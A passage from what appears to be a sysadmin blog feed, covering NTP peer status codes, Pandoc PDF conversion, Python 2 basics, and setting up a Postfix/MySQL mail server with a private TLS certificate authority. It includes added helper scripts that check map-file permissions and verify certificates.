+sambuca.psychon <span class="m">130</span>.149.17.21 <span class="m">2</span> u <span class="m">209</span> <span class="m">128</span> <span class="m">376</span> <span class="m">32</span>.268 -1.497 <span class="m">0</span>.513
+ddbx0.iliad.fr <span class="m">145</span>.238.203.10 <span class="m">3</span> u <span class="m">143</span> <span class="m">128</span> <span class="m">376</span> <span class="m">26</span>.047 -1.112 <span class="m">3</span>.434
</code></pre></div>
<ul>
<li>" " – No state indicated for:
<ul>
<li>non-communicating remote machines,</li>
<li>"LOCAL" for this local host,</li>
<li>(unutilised) high stratum servers,</li>
<li>remote machines that are themselves using this host as their synchronisation reference;</li>
</ul>
</li>
<li>"x" – Out of tolerance, do not use (discarded by intersection algorithm);</li>
<li>"–" – Out of tolerance, do not use (discarded by the cluster algorithm);</li>
<li>"#" – Good remote peer or server but not utilised (not among the first six peers sorted by synchronization distance, ready as a backup source);</li>
<li>"+" – Good and a preferred remote peer or server (included by the combine algorithm);</li>
<li>"*" – The remote peer or server presently used as the primary reference;</li>
<li>"o" – PPS peer (when the prefer peer is valid). The actual system synchronization is derived from a pulse-per-second (PPS) signal, either indirectly via the PPS reference clock driver or directly via kernel interface.</li>
</ul>
<p>https://exchange.nagios.org/directory/Plugins/Network-Protocols/NTP-and-Time/check_stratum/details</p>
<p><strong>Pandoc</strong> - 2018-11-24T10:20:00+01:00 - nlegall - tag:blog.nlegall.fr,2018-11-24:/pandoc.html</p>
<p><em>a universal document converter</em></p>
<h1>Introduction</h1>
<p>Pandoc can convert documents in markdown, reStructuredText, textile, HTML, DocBook, LaTeX, MediaWiki markup, TWiki markup, OPML, Emacs Org-Mode, Txt2Tags, Microsoft Word docx, LibreOffice ODT, EPUB, or Haddock markup to HTML formats, Word processor formats, Ebooks, Documentation formats, InDesign ICML, OPML, LaTeX, ConTeXt, LaTeX Beamer slides, PDF or Lightweight markup formats.</p>
<h1>Installation</h1>
<h2>*nix</h2>
<div class="highlight"><pre><span></span><code>apt install texlive-latex-recommended pandoc
<span class="c1"># or</span>
dnf install pandoc texlive-latex
</code></pre></div>
<h2>Windows</h2>
<p>http://miktex.org/download</p>
<p>https://github.com/jgm/pandoc/releases/latest</p>
<h1>Usage</h1>
<h2>Makefile</h2>
<p><em>available here: https://gist.github.com/Darkitty/258826aac448a522d1a4e5199b316405</em></p>
<p>Converts every file with the <code>md</code> extension to PDF, with syntax highlighting support.</p>
<div class="highlight"><pre><span></span><code># Produce PDFs from all Markdown files in a directory
# List files to be made by finding all *.md files and appending .pdf
PDFS := $(patsubst %.md,%.pdf,$(wildcard *.md))
# The all rule makes all the PDF files listed
all : $(PDFS)
# This generic rule accepts PDF targets with corresponding Markdown
# source, and makes them using pandoc (recipe lines must start with a tab)
%.pdf : %.md
	# Conversion to PDF file (--toc adds a table of contents)
	pandoc -V geometry:paperwidth=21cm -V geometry:paperheight=29.4cm -V geometry:margin=.5cm --highlight-style tango --toc -f markdown $< -o $@
# Remove all PDF outputs
clean :
	rm -f $(PDFS)
# Remove all PDF outputs then build them again
rebuild : clean all
</code></pre></div>
<div class="highlight"><pre><span></span><code>pandoc --listings -H listings-setup.tex --toc -V geometry:"left=1cm, top=1cm, right=1cm, bottom=2cm" .\README.md -o .\README.pdf
</code></pre></div>
<p><strong>Python</strong> - 2018-11-24T10:20:00+01:00 - nlegall - tag:blog.nlegall.fr,2018-11-24:/python.html</p>
<p><img alt="" src="https://img.nlegall.fr/tJnhA9ya"></p>
<p><em>Python is an object-oriented, multi-paradigm, cross-platform programming language. It supports structured imperative, functional and object-oriented programming. It has strong dynamic typing, automatic memory management through garbage collection and an exception handling system; in that respect it is similar to Perl, Ruby, Scheme, Smalltalk and Tcl.</em></p>
<h1>Encoding</h1>
<div class="highlight"><pre><span></span><code><span class="c1"># -*- coding: utf-8 -*-</span>
</code></pre></div>
<h1>Output</h1>
<h2>Special characters</h2>
<table>
<thead>
<tr>
<th>Code</th>
<th>Equivalent</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>\n</code></td>
<td>Line break</td>
</tr>
<tr>
<td><code>\t</code></td>
<td>Tab</td>
</tr>
</tbody>
</table>
<h2>Concatenation with variables</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">moutons</span> <span class="o">=</span> <span class="mi">42</span>
<span class="o">>>></span> <span class="nb">print</span> <span class="s2">"Il y a"</span><span class="p">,</span> <span class="n">moutons</span><span class="p">,</span> <span class="s2">"moutons."</span>
<span class="n">Il</span> <span class="n">y</span> <span class="n">a</span> <span class="mi">42</span> <span class="n">moutons</span><span class="o">.</span>
</code></pre></div>
<h2>Formatted output</h2>
<div class="highlight"><pre><span></span><code>>>> moutons = 42.0
# Integer
>>> print "Il y a %d moutons." % moutons
Il y a 42 moutons.
# Float
>>> print "Il y a %f moutons." % moutons
Il y a 42.000000 moutons.
# String
>>> print "Il y a %s moutons." % moutons
Il y a 42.0 moutons.
</code></pre></div>
<h2>Repetition</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">print</span> <span class="s2">"."</span> <span class="o">*</span> <span class="mi">10</span>
<span class="o">..........</span>
</code></pre></div>
<h2>Text block</h2>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">print</span> <span class="s2">"""</span>
<span class="s2">... C'est l'histoire d'un mouton</span>
<span class="s2">... qui voulait être ami avec</span>
<span class="s2">... un pinguoin.</span>
<span class="s2">... """</span>
<span class="n">C</span><span class="s1">'est l'</span><span class="n">histoire</span> <span class="n">d</span><span class="s1">'un mouton</span>
<span class="n">qui</span> <span class="n">voulait</span> <span class="n">être</span> <span class="n">ami</span> <span class="n">avec</span>
<span class="n">un</span> <span class="n">pinguoin</span><span class="o">.</span>
</code></pre></div>
<h1>Arguments</h1>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">argv</span>
<span class="n">script</span><span class="p">,</span> <span class="n">first</span><span class="p">,</span> <span class="n">second</span><span class="p">,</span> <span class="n">third</span> <span class="o">=</span> <span class="n">argv</span>
</code></pre></div>
<h1>Files</h1>
<h2>Reading</h2>
<div class="highlight"><pre><span></span><code>from sys import argv
# the path of the file to read is taken from the command line
script, filename = argv
txt = open(filename)
print "File contents:"
print txt.read()
txt.close()
</code></pre></div>
<p><strong>Mail server</strong> - 2018-11-24T10:20:00+01:00 - nlegall - tag:blog.nlegall.fr,2018-11-24:/serveur-de-mail.html</p>
<p>To test your mail server, you can use this website: http://www.mail-tester.com. If everything is configured correctly, you should get a score close to 10.</p>
<p><em>Le serveur web utilisé ici est nginx. Vous pouvez tout à fait utiliser Apache2 ou lighttpd à condition d'adapter les configurations web.</em></p>
<p><em>Since users and mail are stored in a database, you need a working MySQL/MariaDB server on your machine.</em></p>
<p>If you want to add a web interface (webmail client) to the mail server, you can follow the procedure <a href="#!Roundcubemail.md">here</a>.</p>
<p><em>domain.tld is the domain name to add.</em></p>
<h1>Architecture</h1>
<p><img alt="" src="https://img.nlegall.fr/zQVaeXAj"></p>
<h2>Sending</h2>
<p><img alt="" src="https://img.nlegall.fr/cYHWFJsG"></p>
<h2>Receiving</h2>
<p><img alt="" src="https://img.nlegall.fr/odxXGa5L"></p>
<h1>Postfix</h1>
<div class="highlight"><pre><span></span><code>apt-get install postfix postfix-mysql
mysql -u root -p
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">database</span> <span class="k">postfix</span><span class="p">;</span>
<span class="k">CREATE</span> <span class="k">USER</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="s1">'MOT DE PASSE'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">USAGE</span> <span class="k">ON</span> <span class="o">*</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="k">postfix</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="s1">'postfix'</span><span class="o">@</span><span class="s1">'localhost'</span><span class="p">;</span>
</code></pre></div>
<h2>Mapping with MySQL</h2>
<h2>Domains</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="n">mailbox</span><span class="o">-</span><span class="n">domains</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">domain</span> <span class="k">FROM</span> <span class="k">domain</span> <span class="k">WHERE</span> <span class="k">domain</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">and</span> <span class="n">backupmx</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">and</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
<h2>Mailboxes</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="n">mailbox</span><span class="o">-</span><span class="n">maps</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="n">maildir</span> <span class="k">FROM</span> <span class="n">mailbox</span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">AND</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
<h2>Aliases</h2>
<div class="highlight"><pre><span></span><code><span class="o">#</span> <span class="n">vim</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="k">postfix</span><span class="o">/</span><span class="n">mysql</span><span class="o">-</span><span class="n">virtual</span><span class="o">-</span><span class="k">alias</span><span class="o">-</span><span class="n">maps</span><span class="p">.</span><span class="n">cf</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="mi">127</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">1</span>
<span class="k">user</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">MOT</span> <span class="n">DE</span> <span class="n">PASSE</span>
<span class="n">dbname</span> <span class="o">=</span> <span class="k">postfix</span>
<span class="n">query</span> <span class="o">=</span> <span class="k">SELECT</span> <span class="k">goto</span> <span class="k">FROM</span> <span class="k">alias</span> <span class="k">WHERE</span> <span class="n">address</span><span class="o">=</span><span class="s1">'%s'</span> <span class="k">AND</span> <span class="n">active</span> <span class="o">=</span> <span class="mi">1</span>
</code></pre></div>
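<p>As an added check that is not part of the original article: the three <code>mysql-virtual-*.cf</code> files above store the database password in clear text, so they should be readable only by root and by the <code>postfix</code> user that Postfix's lookup daemons run as (for example owner <code>root:postfix</code> with mode 640). The script below verifies that no map file is readable by other users; its paths, the <code>postfix</code> user name and the sample files it builds are assumptions.</p>

```shell
#!/bin/sh
# Added example, not from the original article. The three mysql-virtual-*.cf
# files contain the database password in clear text, so they must not be
# readable by "other": root and the "postfix" user (which Debian's Postfix
# lookup daemons run as) are the only ones that need them, e.g. root:postfix
# with mode 640. This script checks the mode of each map and builds a
# constructed demo directory with one private and one leaky map. All paths
# and the demo contents are assumptions.

# Octal permission bits of a file (GNU stat, with a BSD stat fallback).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# check_map_file FILE: succeed only if "other" has no permission at all.
# A missing password line is reported as a warning (probably the wrong file).
check_map_file() {
    f=$1
    mode=$(file_mode "$f")
    other=${mode#${mode%?}}        # last octal digit = bits for "other"
    if [ "$other" != 0 ]; then
        echo "FAIL $f: mode $mode exposes the DB password to every local user" >&2
        return 1
    fi
    grep -q '^password[[:space:]]*=' "$f" || echo "WARN $f: no password line" >&2
    echo "OK   $f: mode $mode"
}

# check_all_maps [DIR]: check every Postfix MySQL map (default /etc/postfix).
check_all_maps() {
    dir=${1:-/etc/postfix}
    rc=0
    for f in "$dir"/mysql-virtual-*.cf; do
        [ -e "$f" ] || continue
        check_map_file "$f" || rc=1
    done
    return $rc
}

# demo_map_dir: constructed sample, one map at the recommended 640 and one
# left at 644 (what most editors create); prints the directory name.
demo_map_dir() {
    d=$(mktemp -d)
    printf 'hosts = 127.0.0.1\nuser = postfix\npassword = EXAMPLE-ONLY\ndbname = postfix\n' \
        > "$d/mysql-virtual-mailbox-domains.cf"
    cp "$d/mysql-virtual-mailbox-domains.cf" "$d/mysql-virtual-alias-maps.cf"
    chmod 640 "$d/mysql-virtual-mailbox-domains.cf"
    chmod 644 "$d/mysql-virtual-alias-maps.cf"
    echo "$d"
}
```

<p>Run <code>check_all_maps /etc/postfix</code> after creating the three files; a non-zero exit status means at least one map is readable by every local user.</p>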
<h2>SSL/TLS generation</h2>
<p><em>It is now possible to do this with Let's Encrypt.</em></p>
<p>You can skip this step if you already have the certificate and key to enable SSL/TLS on the domain (a StartSSL or paid certificate).</p>
<p>You will be asked questions during the following commands. You can fill in whatever information you like (it will appear in the certificate).</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /etc/ssl/
<span class="c1"># Generate the files</span>
openssl genrsa -out ca.key.pem <span class="m">4096</span>
openssl req -x509 -new -nodes -days <span class="m">1460</span> -sha256 -key ca.key.pem -out ca.cert.pem
openssl genrsa -out mailserver.key <span class="m">4096</span>
openssl req -new -sha256 -key mailserver.key -out mailserver.csr
openssl x509 -req -days <span class="m">1460</span> -sha256 -in mailserver.csr -CA ca.cert.pem -CAkey ca.key.pem -CAcreateserial -out mailserver.crt
<span class="c1"># File permissions</span>
chmod <span class="m">444</span> ca.cert.pem
chmod <span class="m">444</span> mailserver.crt
chmod <span class="m">400</span> ca.key.pem
chmod <span class="m">400</span> mailserver.key
<span class="c1"># Move the files into their directories</span>
mv ca.key.pem private/
mv ca.cert.pem certs/
mv mailserver.key private/
mv mailserver.crt certs/
</code></pre></div>
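<p>The same private-CA procedure, as an added example that is not part of the original article: the <code>openssl</code> commands above run without prompts (<code>-subj</code> replaces them), the server certificate gets a <code>subjectAltName</code> (clients match the hostname against the SAN, not the CN), and a verification step confirms that the key matches the certificate and that the certificate chains to the CA before Postfix is pointed at the files. The directory, hostname, key size and CA name are parameters or assumptions, and the move into <code>certs/</code> and <code>private/</code> is left as shown above.</p>

```shell
#!/bin/sh
# Added example, not from the original article: the private-CA procedure of
# the openssl commands above, run without prompts (-subj), with a
# subjectAltName on the server certificate, and followed by a verification
# step that confirms the key/certificate match and the chain to the CA. The
# directory, hostname, key size and the CA's name are parameters or
# assumptions; moving the files into certs/ and private/ is left as above.

# make_mail_certs DIR HOSTNAME [BITS]: writes ca.key.pem, ca.cert.pem,
# mailserver.key, mailserver.csr and mailserver.crt into DIR.
make_mail_certs() {
    dir=$1; host=$2; bits=${3:-4096}
    mkdir -p "$dir" || return 1
    # private CA: key plus a self-signed certificate (4 years, as above)
    openssl genrsa -out "$dir/ca.key.pem" "$bits" 2>/dev/null || return 1
    openssl req -x509 -new -nodes -days 1460 -sha256 -key "$dir/ca.key.pem" \
        -subj "/CN=Private mail CA" -out "$dir/ca.cert.pem" || return 1
    # server key and certificate signing request
    openssl genrsa -out "$dir/mailserver.key" "$bits" 2>/dev/null || return 1
    openssl req -new -sha256 -key "$dir/mailserver.key" -subj "/CN=$host" \
        -out "$dir/mailserver.csr" || return 1
    # sign with the CA; the SAN comes from a one-line extension file,
    # because clients match the hostname against the SAN, not the CN
    printf 'subjectAltName=DNS:%s\n' "$host" > "$dir/san.ext" || return 1
    openssl x509 -req -days 1460 -sha256 -in "$dir/mailserver.csr" \
        -CA "$dir/ca.cert.pem" -CAkey "$dir/ca.key.pem" -CAcreateserial \
        -extfile "$dir/san.ext" -out "$dir/mailserver.crt" 2>/dev/null || return 1
    # same permissions as above: certificates readable, keys owner-only
    chmod 444 "$dir/ca.cert.pem" "$dir/mailserver.crt" || return 1
    chmod 400 "$dir/ca.key.pem" "$dir/mailserver.key"
}

# verify_mail_certs DIR: succeed only if the key belongs to the certificate
# and the certificate validates against the CA; prints subject and expiry.
verify_mail_certs() {
    dir=$1
    # an RSA key and its certificate share the same public modulus
    kmod=$(openssl rsa -noout -modulus -in "$dir/mailserver.key" 2>/dev/null)
    cmod=$(openssl x509 -noout -modulus -in "$dir/mailserver.crt" 2>/dev/null)
    if [ -z "$kmod" ] || [ "$kmod" != "$cmod" ]; then
        echo "FAIL: mailserver.key does not match mailserver.crt" >&2
        return 1
    fi
    if ! openssl verify -CAfile "$dir/ca.cert.pem" "$dir/mailserver.crt" >/dev/null 2>&1; then
        echo "FAIL: mailserver.crt does not chain to ca.cert.pem" >&2
        return 1
    fi
    echo "OK: $(openssl x509 -noout -subject -enddate -in "$dir/mailserver.crt" | tr '\n' ' ')"
}

# stand-alone use: sh mailcerts.sh /etc/ssl mail.domain.tld
if [ "$#" -ge 2 ]; then
    make_mail_certs "$1" "$2" && verify_mail_certs "$1"
fi
```

<p>Usage: <code>sh mailcerts.sh /etc/ssl mail.domain.tld</code>. The modulus comparison catches the common mistake of pairing a regenerated key with an old certificate, and <code>openssl verify</code> catches a certificate signed by the wrong CA; both would otherwise only show up as TLS handshake failures in the Postfix log.</p>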
<h2>Configuration files</h2>
<div class="highlight"><pre><span></span><code>mv /etc/postfix/main.cf /etc/postfix/main.cf.bak
cp /etc/postfix/master.cf /etc/postfix/master.cf.bak
</code></pre></div>
<h2>/etc/postfix/main.cf</h2>
<div class="highlight"><pre><span></span><code><span class="s s-Atom">############</span>
<span class="s s-Atom">#</span> <span class="nv">GENERAL</span> <span class="nv">SETTINGS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">############</span>
<span class="s s-Atom">smtpd_banner</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">myhostname</span> <span class="nv">ESMTP</span> <span class="err">$</span><span class="nf">mail_name</span> <span class="p">(</span><span class="nv">Debian</span><span class="o">/</span><span class="nv">GNU</span><span class="p">)</span>
<span class="s s-Atom">biff</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">append_dot_mydomain</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">readme_directory</span> <span class="o">=</span> <span class="s s-Atom">no</span>
<span class="s s-Atom">delay_warning_time</span> <span class="o">=</span> <span class="mi">4</span><span class="s s-Atom">h</span>
<span class="s s-Atom">mailbox_command</span> <span class="o">=</span> <span class="s s-Atom">procmail</span> <span class="o">-</span><span class="s s-Atom">a</span> <span class="s2">"$EXTENSION"</span>
<span class="s s-Atom">recipient_delimiter</span> <span class="o">=</span> <span class="o">+</span>
<span class="s s-Atom">disable_vrfy_command</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">message_size_limit</span> <span class="o">=</span> <span class="mi">502400000</span>
<span class="s s-Atom">mailbox_size_limit</span> <span class="o">=</span> <span class="mi">1024000000</span>
<span class="s s-Atom">inet_interfaces</span> <span class="o">=</span> <span class="s s-Atom">all</span>
<span class="s s-Atom">inet_protocols</span> <span class="o">=</span> <span class="s s-Atom">ipv4</span>
<span class="s s-Atom">myhostname</span> <span class="o">=</span> <span class="s s-Atom">hostname</span><span class="p">.</span><span class="s s-Atom">domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">myorigin</span> <span class="o">=</span> <span class="s s-Atom">hostname</span><span class="p">.</span><span class="s s-Atom">domain</span><span class="p">.</span><span class="s s-Atom">tld</span>
<span class="s s-Atom">mydestination</span> <span class="o">=</span> <span class="s s-Atom">localhost</span> <span class="s s-Atom">localhost</span><span class="p">.</span><span class="err">$</span><span class="s s-Atom">mydomain</span>
<span class="s s-Atom">mynetworks</span> <span class="o">=</span> <span class="mf">127.0.0.0</span><span class="o">/</span><span class="mi">8</span> <span class="p">[</span><span class="s s-Atom">::</span><span class="nn">ffff</span><span class="p">:</span><span class="mf">127.0.0.0</span><span class="p">]</span><span class="o">/</span><span class="mi">104</span> <span class="p">[</span><span class="s s-Atom">::</span><span class="mi">1</span><span class="p">]</span><span class="o">/</span><span class="mi">128</span>
<span class="s s-Atom">relayhost</span> <span class="o">=</span>
<span class="s s-Atom">alias_maps</span> <span class="o">=</span> <span class="nn">hash</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">aliases</span>
<span class="s s-Atom">alias_database</span> <span class="o">=</span> <span class="nn">hash</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">aliases</span>
<span class="s s-Atom">##########</span>
<span class="s s-Atom">#</span> <span class="nv">TLS</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">##########</span>
<span class="s s-Atom">#</span> <span class="nv">Smtp</span> <span class="p">(</span> <span class="nv">OUTGOING</span> <span class="o">/</span> <span class="nv">Client</span> <span class="p">)</span>
<span class="s s-Atom">smtp_tls_loglevel</span> <span class="o">=</span> <span class="mi">1</span>
<span class="s s-Atom">smtp_tls_security_level</span> <span class="o">=</span> <span class="s s-Atom">may</span>
<span class="s s-Atom">smtp_tls_CAfile</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">certs</span><span class="o">/</span><span class="s s-Atom">ca</span><span class="p">.</span><span class="s s-Atom">cert</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">smtp_tls_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtp_tls_mandatory_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtp_tls_mandatory_ciphers</span> <span class="o">=</span> <span class="s s-Atom">high</span>
<span class="s s-Atom">smtp_tls_exclude_ciphers</span> <span class="o">=</span> <span class="s s-Atom">aNULL</span><span class="p">,</span> <span class="s s-Atom">eNULL</span><span class="p">,</span> <span class="nv">EXPORT</span><span class="p">,</span> <span class="nv">DES</span><span class="p">,</span> <span class="mi">3</span><span class="nv">DES</span><span class="p">,</span> <span class="nv">RC2</span><span class="p">,</span> <span class="nv">RC4</span><span class="p">,</span> <span class="nv">MD5</span><span class="p">,</span> <span class="nv">PSK</span><span class="p">,</span> <span class="nv">SRP</span><span class="p">,</span> <span class="nv">DSS</span><span class="p">,</span> <span class="nv">AECDH</span><span class="p">,</span> <span class="nv">ADH</span>
<span class="s s-Atom">smtp_tls_note_starttls_offer</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">---------------------------------------------------------------------------------------------------</span>
<span class="s s-Atom">#</span> <span class="nv">Smtpd</span> <span class="p">(</span> <span class="nv">INCOMING</span> <span class="o">/</span> <span class="nv">Server</span> <span class="p">)</span>
<span class="s s-Atom">smtpd_tls_loglevel</span> <span class="o">=</span> <span class="mi">1</span>
<span class="s s-Atom">smtpd_tls_auth_only</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_tls_security_level</span> <span class="o">=</span> <span class="s s-Atom">may</span>
<span class="s s-Atom">smtpd_tls_received_header</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_tls_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtpd_tls_mandatory_protocols</span> <span class="o">=</span> <span class="p">!</span><span class="nv">SSLv2</span><span class="p">,</span> <span class="p">!</span><span class="nv">SSLv3</span>
<span class="s s-Atom">smtpd_tls_mandatory_ciphers</span> <span class="o">=</span> <span class="s s-Atom">medium</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">Info (see: postconf -d)</span>
<span class="s s-Atom">#</span> <span class="nv">Medium</span> <span class="s s-Atom">cipherlist</span> <span class="o">=</span> <span class="nf">aNULL</span><span class="o">:-</span><span class="s s-Atom">aNULL:</span><span class="nv">ALL</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">EXPORT</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">LOW</span><span class="s s-Atom">:+</span><span class="nv">RC4</span><span class="s s-Atom">:@</span><span class="nv">STRENGTH</span>
<span class="s s-Atom">#</span> <span class="nv">High</span> <span class="s s-Atom">cipherlist</span> <span class="o">=</span> <span class="nf">aNULL</span><span class="o">:-</span><span class="s s-Atom">aNULL:</span><span class="nv">ALL</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">EXPORT</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">LOW</span><span class="s s-Atom">:</span><span class="p">!</span><span class="nv">MEDIUM</span><span class="s s-Atom">:+</span><span class="nv">RC4</span><span class="s s-Atom">:@</span><span class="nv">STRENGTH</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">smtpd_tls_exclude_ciphers</span> <span class="o">=</span> <span class="s s-Atom">DO NOT change this directive, for compatibility</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">with other mail servers, to avoid an error such as</span>
<span class="s s-Atom">#</span> <span class="s2">"no shared cipher"</span> <span class="s s-Atom">or</span> <span class="s2">"no cipher overlap"</span> <span class="s s-Atom">followed by a fallback to</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">plain/text...</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">smtpd_tls_cipherlist</span> <span class="o">=</span> <span class="s s-Atom">Do not change this one either!</span>
<span class="s s-Atom">smtpd_tls_CAfile</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">smtp_tls_CAfile</span>
<span class="s s-Atom">smtpd_tls_cert_file</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">certs</span><span class="o">/</span><span class="s s-Atom">mailserver</span><span class="p">.</span><span class="s s-Atom">crt</span>
<span class="s s-Atom">smtpd_tls_key_file</span> <span class="o">=</span> <span class="o">/</span><span class="s s-Atom">etc</span><span class="o">/</span><span class="s s-Atom">ssl</span><span class="o">/</span><span class="s s-Atom">private</span><span class="o">/</span><span class="s s-Atom">mailserver</span><span class="p">.</span><span class="s s-Atom">key</span>
<span class="s s-Atom">smtpd_tls_dh1024_param_file</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">config_directory</span><span class="o">/</span><span class="s s-Atom">dh2048</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">smtpd_tls_dh512_param_file</span> <span class="o">=</span> <span class="err">$</span><span class="s s-Atom">config_directory</span><span class="o">/</span><span class="s s-Atom">dh512</span><span class="p">.</span><span class="s s-Atom">pem</span>
<span class="s s-Atom">tls_preempt_cipherlist</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">tls_random_source</span> <span class="o">=</span> <span class="nn">dev</span><span class="p">:</span><span class="o">/</span><span class="s s-Atom">dev</span><span class="o">/</span><span class="s s-Atom">urandom</span>
<span class="s s-Atom">smtp_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">smtp_scache</span>
<span class="s s-Atom">smtpd_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">smtpd_scache</span>
<span class="s s-Atom">lmtp_tls_session_cache_database</span> <span class="o">=</span> <span class="nn">btree</span><span class="p">:</span><span class="err">$</span><span class="p">{</span><span class="s s-Atom">data_directory</span><span class="p">}</span><span class="o">/</span><span class="s s-Atom">lmtp_scache</span>
<span class="s s-Atom">#</span> <span class="s s-Atom">----------------------------------------------------------------------</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">#</span> <span class="nv">SASL</span> <span class="nv">PARAMETERS</span> <span class="s s-Atom">#</span>
<span class="s s-Atom">###########</span>
<span class="s s-Atom">smtpd_sasl_auth_enable</span> <span class="o">=</span> <span class="s s-Atom">yes</span>
<span class="s s-Atom">smtpd_sasl_type</span> <span class="o">=</span> <span class="s s-Atom">dovecot</span>
